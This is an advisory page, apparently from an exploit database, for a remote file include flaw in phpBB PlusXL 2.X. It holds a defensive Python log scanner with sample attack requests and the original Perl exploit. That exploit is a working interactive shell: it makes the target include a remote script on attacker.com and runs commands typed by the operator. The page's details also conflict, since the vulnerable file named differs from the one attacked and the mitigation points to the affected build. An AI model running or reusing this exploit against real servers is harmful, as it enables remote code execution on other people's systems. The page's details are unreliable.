Vendor: phpBB PlusXL
By: hkicken
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: phpBB PlusXL
Affected Version From: 2.X build 272
Affected Version To: 2.X build 272
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

phpBB PlusXL 2.X Remote File Include Vulnerability

A remote file include vulnerability exists in phpBB PlusXL 2.X build 272. The 'includes/functions.php' script does not properly sanitize user-supplied input to the 'phpbb_root_path' parameter. An attacker can exploit this by sending a crafted HTTP request that contains a URL in the 'phpbb_root_path' parameter, which leads to execution of arbitrary code on the vulnerable system.
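
For defenders, one way to find attempts against this flaw in web server access logs, shown as an added example that is not part of the original advisory or exploit: it flags any request whose 'phpbb_root_path' value decodes to a URL instead of a local path. The Common/Combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client IP, request target and status from a Common/Combined Log Format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# A legitimate phpbb_root_path is a relative directory such as "./"; a
# scheme:// prefix or protocol-relative //host means a remote include attempt.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2568ttp) up to `rounds` times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(lines, param="phpbb_root_path"):
    """Return (client_ip, script_path, decoded_value, status) for each hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # parse_qsl decodes once; fully_decode handles double encoding.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            if name.lower() == param and REMOTE_RE.match(value):
                hits.append((m.group("ip"), url.path, value,
                             int(m.group("status"))))
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Oct/2006:10:01:02 +0000] "GET /plusxl20/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Oct/2006:10:02:11 +0000] "GET /plusxl20/mods/iai/includes/constants.php?phpbb_root_path=http://remote.example/cmd.txt?cmd=id? HTTP/1.1" 200 312',
    '198.51.100.7 - - [13/Oct/2006:10:02:40 +0000] "GET /plusxl20/mods/iai/includes/constants.php?phpbb_root_path=%2568ttp%253A%252F%252Fremote.example%252Fc.txt HTTP/1.1" 200 0',
    '203.0.113.5 - - [13/Oct/2006:10:03:00 +0000] "GET /plusxl20/admin/index.php?phpbb_root_path=./ HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 on a script that normally returns nothing when requested directly deserves a closer look at the server's outbound connections around the same timestamp.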

Mitigation:

Upgrade to the latest version of phpBB PlusXL 2.X build 272 or apply the patch from the vendor.

Exploit-DB raw data:

#!/usr/bin/perl
 
#####################################################################################################
#                                                                                                   #
# phpBB PlusXL 2.X biuld 272                                                                        #
#                                                                                                   #
# Class:  Remote File Include Vulnerability                                                         #
#                                                                                                   #
# Patch:  unavailable                                                                               #
#                                                                                                   #
# Date:   2006/10/12                                                                                #
#                                                                                                   #
# Remote: Yes                                                                                       #
#                                                                                                   #
# Type:   high                                                                                      #
#                                                                                                   #
# Site:   http://www.xs4all.nl/~hkicken/plusxl.htm                                                  #
#                                                                                                   #
#####################################################################################################


use IO::Socket;
use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt";   # <====== Change This Line With Your Personal Script

print "\n";
print "##########################################################################\n";
print "#                                                                        #\n";
print "# phpBB PlusXL 2.x <= biuld 272    Remote File Include Vulnerability     #\n";
print "# Bug found By : Ashiyane Corporation                                    #\n";
print "# Email: nima salehi    nima[at]ashiyane.ir                              #\n";
print "# Web Site : www.Ashiyane.ir                                             #\n";
print "#                                                                        #\n";
print "##########################################################################\n";


if (@ARGV < 2)
{
    print "\n Usage: Ashiyane.pl [host] [path] ";
    print "\n EX : Ashiyane.pl www.victim.com /plusxl20/  \n\n";
exit;
}


$host=$ARGV[0];
$path=$ARGV[1];
$vul="mods/iai/includes/constants.php?phpbb_root_path="

print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";

print "<Shell> ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";

    print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "<Shell> ";
    $cmd = <STDIN>;
}

# milw0rm.com [2006-10-13]